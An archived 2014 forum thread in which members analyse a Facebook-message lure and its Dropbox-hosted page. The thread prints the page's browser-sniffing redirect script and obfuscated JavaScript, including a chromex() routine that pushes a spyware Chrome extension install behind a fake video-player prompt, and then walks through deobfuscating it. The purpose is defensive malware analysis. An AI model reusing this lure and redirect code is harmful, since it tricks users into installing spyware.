possible malicious redirect from fake FB message [Archive]

View Full Version : possible malicious redirect from fake FB message

evaluator

December 7th, 2014, 14:04

just received in FB_messages URL:
http://goo.gl/DYkWzd
which goes to
https://dl.dropbox.com/s/dq4fio0g3wt5t35/saioduas09dsads_7.htm?1544593599

Code:

 <script type="text/javascript"> // <![CDATA[

if ( (navigator.userAgent.indexOf('Android') != -1) ) {

document.location = "http://teladea.blogspot.com";

} // ]]>

</script>     

<script language=javascript>

if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))

{

location.replace("http://teladea.blogspot.com";

}

</script>

 <body>



<script>





if (navigator['userAgent']['indexOf']('Firefox') != -1) {

    window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/mff35.html';

} else {

    if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {

        window['location'] = 'http://google.com';

    } else {

        if (navigator['userAgent']['indexOf']('Chrome') != -1) {

            window['location'] = 'http://video5826.s3-website.eu-central-1.amazonaws.com/soda2/index.html';

            } else {

            window['location'] = 'http://teladea.blogspot.com';

        };

    };

};



//sadiuvsnavcsicusdasaasd

//dsafasd89fasd879fasd87d



</script>

</body>

//sadf654sda65fsa798dfsad4fsd5

//cvgbffdsssssa213dasdas456dasd879asd34as879

Kayaker

December 7th, 2014, 18:34

eval();

I was able to wget the index.html file (attached) that the Chrome link points to. The Firefox one gave a 403. The html file has 3 packed javascript entries that decode from an eval() statement. I unpacked the js using an online decoder (http://www.strictly-software.com/unpacker).

All I could really make sense of from the result was the "function chromex()", so I googled that and found that this seems to be about installing a spyware plugin on your Chrome (or Firefox) browser.

http://hacklog.in/warning-new-spyware-on-facebook/

btw, Does anyone know a simple trick to parse out the values from what appears to be array elements used in the document[] and other statements, other than doing it manually?

K

Code:



var _0x8f38 = ["\x47\x45\x54", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6C\x69\x7A\x65\x2E\x63\x6F\x6D\x2F\x67\x65\x6F \x69\x70", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x70\x61\x72\x73\x65", "\x63\x6F\x75\x6E\x74\x72\x79\x5F\x63\x6F\x64\x65", "\x55\x53", "\x20\x20\x3C\x62\x6F\x64\x79\x3E\x20\x20", "\x77\x72\x69\x74\x65", "\x20\x3C\x62\x6F\x64\x79\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x63\x68\x72\x6F\x6D\x65\x78\x28\x29 \x3B\x22\x3E"];

var xmlhttpz = new XMLHttpRequest();

xmlhttpz[_0x8f38[2]](_0x8f38[0], _0x8f38[1], false);

xmlhttpz[_0x8f38[3]]();

var get = JSON[_0x8f38[5]](xmlhttpz[_0x8f38[4]]);

var country = get[_0x8f38[6]];

if (country == _0x8f38[7]) {

    document[_0x8f38[9]](_0x8f38[8])

} else {

    document[_0x8f38[9]](_0x8f38[10])

};

Code:



var _0x805f = ["\x47\x45\x54", "\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x74\x65\x6C\x69\x7A\x65\x2E\x63\x6F\x6D\x2F\x67\x65\x6F \x69\x70", "\x6F\x70\x65\x6E", "\x73\x65\x6E\x64", "\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74", "\x70\x61\x72\x73\x65", "\x63\x6F\x75\x6E\x74\x72\x79\x5F\x63\x6F\x64\x65", "\x55\x53", "\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x35\x30\x30\x22\x20\x68\x65\x69\x67\x68 \x74\x3D\x22\x33\x31\x35\x22\x20\x73\x72\x63\x3D\x22\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62 \x65\x2E\x63\x6F\x6D\x2F\x65\x6D\x62\x65\x64\x2F\x6F\x46\x4D\x73\x71\x72\x47\x39\x52\x57\x67\x22\x20 \x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C \x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E", "\x77\x72\x69\x74\x65", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20\x63\x6C\x61\x73 \x73\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x62\x6C\x6F\x63\x6B\x65\x72\x22\x20\x73\x74\x79\x6C\x65\x3D \x22\x77\x69\x64\x74\x68\x3A\x35\x30\x30\x70\x78\x3B\x68\x65\x69\x67\x68\x74\x3A\x33\x30\x30\x70\x78 \x3B\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x23\x30\x30\x30\x30\x30\x30\x3B\x22\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20 \x63\x6C\x61\x73\x73\x3D\x22\x69\x6D\x61\x67\x65\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x61\x63\x6B \x67\x72\x6F\x75\x6E\x64\x2D\x69\x6D\x61\x67\x65\x3A\x20\x75\x72\x6C\x28\x26\x23\x33\x39\x3B\x2E\x68 \x74\x74\x70\x3A\x2F\x2F\x76\x6F\x64\x6F\x2E\x6D\x65\x2F\x74\x72\x61\x63\x6B\x2F\x77\x70\x2D\x63\x6F \x6E\x74\x65\x6E\x74\x2F\x75\x70\x6C\x6F\x61\x64\x73\x2F\x32\x30\x31\x34\x2F\x30\x37\x2F\x66\x67\x66 \x64\x67\x70\x6C\x2E\x6A\x70\x67\x26\x23\x33\x39\x3B\x29\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20 \x63\x6C\x61\x73\x73\x3D\x22\x70\x6C\x61\x79\x2D\x62\x75\x74\x74\x6F\x6E\x22\x3E\x3C\x2F\x64\x69\x76 \x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20 \x63\x6C\x61\x73\x73\x3D\x22\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x73\x22\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C \x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6C\x65\x66\x74\x2D\x63\x6F\x6E\x74\x72\x6F\x6C\x6C\x73 \x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C \x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x72\x69\x67\x68\x74\x2D\x63\x6F\x6E\x74\x72\x6F\x6C\x6C \x73\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x64\x69\x76 \x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20 \x63\x6C\x61\x73\x73\x3D\x22\x6F\x76\x65\x72\x6C\x61\x79\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x64\x69\x76\x20 \x63\x6C\x61\x73\x73\x3D\x22\x73\x68\x61\x72\x65\x62\x6F\x78\x22\x3E\x3C\x2F\x64\x69\x76\x3E", "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x2F\x64\x69\x76\x3E"];

var xmlhttpz = new XMLHttpRequest();

xmlhttpz[_0x805f[2]](_0x805f[0], _0x805f[1], false);

xmlhttpz[_0x805f[3]]();

var get = JSON[_0x805f[5]](xmlhttpz[_0x805f[4]]);

var country = get[_0x805f[6]];

if (country == _0x805f[7]) {

    document[_0x805f[9]](_0x805f[8])

} else {

    document[_0x805f[9]](_0x805f[10]);

    document[_0x805f[9]](_0x805f[11]);

    document[_0x805f[9]](_0x805f[12]);

    document[_0x805f[9]](_0x805f[13]);

    document[_0x805f[9]](_0x805f[14]);

    document[_0x805f[9]](_0x805f[15]);

    document[_0x805f[9]](_0x805f[16]);

    document[_0x805f[9]](_0x805f[17]);

    document[_0x805f[9]](_0x805f[18]);

    document[_0x805f[9]](_0x805f[19])

};

Code:



var _0x3f6e = ["\x63\x6C\x69\x63\x6B", "\x2E\x79\x6F\x75\x74\x75\x62\x65\x62\x6C\x6F\x63\x6B\x65\x72", "\x72\x65\x61\x64\x79", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x63\x68\x72\x6F\x6D\x65\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D \x2F\x77\x65\x62\x73\x74\x6F\x72\x65\x2F\x64\x65\x74\x61\x69\x6C\x2F", "", "\x73\x74\x79\x6C\x65", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x36\x65\x65\x35\x35\x32 \x3B", "\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65", "\x62\x6F\x64\x79", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C", "\x54\x68\x61\x6E\x6B\x20\x79\x6F\x75\x20\x46\x6F\x72\x20\x59\x6F\x75\x72\x20\x53\x65\x74\x75\x70\x2C \x20\x53\x65\x74\x75\x70\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x2E\x20\x50\x6C\x65\x61 \x73\x65\x20\x57\x61\x69\x74\x20\x33\x20\x53\x65\x63\x6F\x6E\x64\x73\x2C\x20\x56\x69\x64\x65\x6F\x20 \x53\x74\x61\x72\x74\x69\x6E\x67\x2E\x2E\x2E", "\x54\x68\x61\x6E\x6B\x20\x79\x6F\x75\x20\x46\x6F\x72\x20\x59\x6F\x75\x72\x20\x53\x65\x74\x75\x70\x2C \x20\x53\x65\x74\x75\x70\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6C\x6C\x79\x2E\x20\x0D\x0A\x20\x50 \x6C\x65\x61\x73\x65\x20\x57\x61\x69\x74\x20\x33\x20\x53\x65\x63\x6F\x6E\x64\x73\x2C\x20\x56\x69\x64 \x65\x6F\x20\x53\x74\x61\x72\x74\x69\x6E\x67\x2E", "\x68\x72\x65\x66", "\x68\x74\x74\x70\x3A\x2F\x2F\x67\x6F\x6F\x2E\x67\x6C\x2F\x73\x68\x72\x54\x78\x42", "\x73\x72\x63", "\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x77\x69\x64\x67\x65\x74\x2F\x61\x64 \x65\x61\x64\x69\x74\x69\x31\x2E\x70\x6E\x67", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67 \x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62 \x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63 \x6F\x6C\x6F\x72\x3A\x20\x23\x66\x39\x66\x39\x66\x39\x3B\x22\x29\x3B", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67 \x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62 \x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63 \x6F\x6C\x6F\x72\x3A\x20\x23\x36\x65\x65\x35\x35\x32\x3B\x22\x29\x3B", "\x77\x69\x6E\x64\x6F\x77\x2E\x63\x6C\x6F\x73\x65\x28\x29\x3B", "\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x65\x64\x3B", "\x4D\x69\x73\x73\x69\x6E\x67\x20\x50\x6C\x61\x79\x65\x72\x21\x20\x50\x6C\x65\x61\x73\x65\x20\x61\x64 \x64\x20", "\x20\x74\x6F\x20\x77\x61\x74\x63\x68\x20\x74\x68\x69\x73\x20\x76\x69\x64\x65\x6F", "\x20\x69\x6E\x20\x6F\x72\x64\x65\x72\x20\x74\x6F\x20\x77\x61\x74\x63\x68\x20\x74\x68\x69\x73\x20\x76 \x69\x64\x65\x6F", "\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67 \x4E\x61\x6D\x65\x28\x22\x62\x6F\x64\x79\x22\x29\x5B\x30\x5D\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62 \x75\x74\x65\x28\x22\x73\x74\x79\x6C\x65\x22\x2C\x22\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x2D\x63 \x6F\x6C\x6F\x72\x3A\x20\x72\x65\x64\x3B\x22\x29\x3B", "\x69\x6E\x73\x74\x61\x6C\x6C", "\x77\x65\x62\x73\x74\x6F\x72\x65"];

$(document)[_0x3f6e[2]](function () {

    $(_0x3f6e[1])[_0x3f6e[0]](function () {

        chromex()

    })

});

function chromex() {

    chrome[_0x3f6e[26]][_0x3f6e[25]](_0x3f6e[3] + check + _0x3f6e[4], function () {

        document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[6]);

        titulo[_0x3f6e[10]] = _0x3f6e[11];

        alert(_0x3f6e[12]);

        location[_0x3f6e[13]] = _0x3f6e[14];

        new Image()[_0x3f6e[15]] = _0x3f6e[16];

        setTimeout(_0x3f6e[17], 500);

        setTimeout(_0x3f6e[18], 1000);

        setTimeout(_0x3f6e[17], 1500);

        setTimeout(_0x3f6e[18], 2000);

        setTimeout(_0x3f6e[17], 2500);

        setTimeout(_0x3f6e[18], 3000);

        setTimeout(_0x3f6e[19], 4000)

    },

    function (_0x95afx2) {

        document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[20]);

        titulo[_0x3f6e[10]] = _0x3f6e[21] + emri + _0x3f6e[22];

        alert(_0x3f6e[21] + emri + _0x3f6e[23]);

        setTimeout(_0x3f6e[17], 500);

        setTimeout(_0x3f6e[24], 1000);

        setTimeout(_0x3f6e[17], 1500);

        setTimeout(_0x3f6e[24], 2000);

        setTimeout(_0x3f6e[17], 2500)

    })

};

peterg70

December 8th, 2014, 08:10

Hey Kayaker

Do you mean converting the escaped text in the array to normal text??
I use http://jsbeautifier.org/ to clean up this sort of code.
choose the option "Unescape printable chars encoded as \xNN or \uNNNN"
or
Use firebug in firefox to examine the code.

Code:



var _0x8f38 = ["GET", "http://www.telize.com/geoip", "open", "send", "responseText", "parse", "country_code", "US", "  <body>  ", "write", " <body onclick=\"chromex();\">"];

blabberer

December 8th, 2014, 14:34

firefox mff35 403
wget -c video5826.s3-website.eu-central-1.amazonaws.com/index.html retrievable attached below
tries to get 1 png to 1 css and 4 js also attached
archieve password is justincase

Code:



wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/mff35.html

Connecting to video5826.s3-website.eu-central-1.amazonaws.com|54.231.192.19|:80.

2014-12-09 00:01:43 ERROR 403: Forbidden.

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/index.html

2014-12-09 00:01:58 (345 KB/s) - `index.html' saved [11012/11012]

wget -c http://whos.amung.us/widget/adeaditi.png

2014-12-09 00:27:40 (43.7 MB/s) - `289.png' saved [1612/1612]

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/small.js

2014-12-09 00:29:29 (429 KB/s) - `small.js' saved [4801/4801]

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/jquery.min.js

2014-12-09 00:30:05 (4.34 KB/s) - `jquery.min.js' saved [94843/94843]

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/small.js

    The file is already fully retrieved; nothing to do.

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/style.css

2014-12-09 00:30:46 (53.3 KB/s) - `style.css' saved [3468/3468]

wget -c http://video5826.s3-website.eu-central-1.amazonaws.com/tc.js

2014-12-09 00:31:02 (244 KB/s) - `tc.js' saved [8619/8619]

2964

Kayaker

December 9th, 2014, 02:34

Hi peterg70

That's a good idea about using Firebug, it certainly makes things easier. I tend to forget about it.

Actually it was more about solving for the 'document' and other statements. Normally I'd use an alert box to resolve the output, but the syntax was throwing me.

For example a line similar to this one is used quite often.
document[_0x8f38[9]](_0x8f38[8])

The first item uses square brackets and in this example points to array element 9 = "write". I realize now that this decodes to document.write(). The second item is wrapped in round brackets and points to another array element, that being the document.write() variable itself, _0x8f38[8] = "<body>".

I was able to use the following to glean what it meant:
window.alert (_0x8f38[9] + _0x8f38[8]);

But yeah, it's a lot easier just using Firebug than trying to write syntactically correct and readable window.alert() messages all over the place.

This line for example
document[_0x3f6e[9]](_0x3f6e[8])[0][_0x3f6e[7]](_0x3f6e[5], _0x3f6e[6]);
By expanding the _0x3f6e array listing you can piece together the meaning on the fly:
document.getElementsByTagName("body"[0].setAttribute("style","background-color: #6ee552;"

Thanks,
K

peterg70

December 9th, 2014, 07:34

Kayaker

Sorry for the misunderstanding.

I found another one in my bookmarks which handles the arrays.
http://www.checkwebtool.com/tool/unminify-js
OR http://unminify.appspot.com/
This will convert the code above to

Code:



var xmlhttpz = new XMLHttpRequest();

xmlhttpz['open']('GET', 'http://www.telize.com/geoip', false);

xmlhttpz['send']();

var get = JSON['parse'](xmlhttpz['responseText']);

var country = get['country_code'];

if (country == 'US') {

    document['write']('<iframe width="500" height="315" src="//www.youtube.com/embed/oFMsqrG9RWg" frameborder="0" allowfullscreen></iframe>')

} else {

    document['write']('                <div class="youtubeblocker" style="width:500px;height:300px;background:#000000;">');

    document['write']('                    <div class="image" style="background-image: url('.http://vodo.me/track/wp-content/uploads/2014/07/fgfdgpl.jpg')"></div>');

    document['write']('                    <div class="play-button"></div>');

    document['write']('                    <div class="controlls">');

    document['write']('                        <div class="left-controlls"></div>');

    document['write']('                        <div class="right-controlls"></div>');

    document['write']('                    </div>');

    document['write']('                    <div class="overlay"></div>');

    document['write']('                    <div class="sharebox"></div>');

    document['write']('                </div>')

};

evaluator

December 9th, 2014, 13:57

yep, so this was 17 august discovery from hacklog.in..
there is written about Chromium browsers and new Opera is such one. Is it also affected?

Kayaker

December 9th, 2014, 23:53

Quote:

[Originally Posted by peterg70;96777]
I found another one in my bookmarks which handles the arrays.
http://www.checkwebtool.com/tool/unminify-js
OR http://unminify.appspot.com/

Oh that is absolutely perfect. Thanks!